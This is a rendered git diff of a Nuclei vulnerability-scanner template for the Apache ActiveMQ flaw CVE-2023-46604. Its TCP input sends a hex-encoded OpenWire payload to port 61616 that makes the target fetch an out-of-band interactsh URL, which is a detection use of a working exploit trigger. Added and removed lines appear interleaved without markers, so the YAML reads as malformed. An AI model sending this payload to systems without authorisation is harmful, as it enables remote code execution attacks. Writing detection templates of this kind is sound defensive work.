Update and rename CVE-2023-46604.yaml to CVE-2023-46604.yaml
parent
75f3d19215
commit
0d1d5020ee
|
@ -33,15 +33,15 @@ variables:
|
|||
tcp:
|
||||
- inputs:
|
||||
- data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}"
|
||||
port: "61616"
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
port: 61616
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
part: interactsh_protocol
|
||||
- "http"
|
||||
|
||||
- type: word
|
Loading…
Reference in New Issue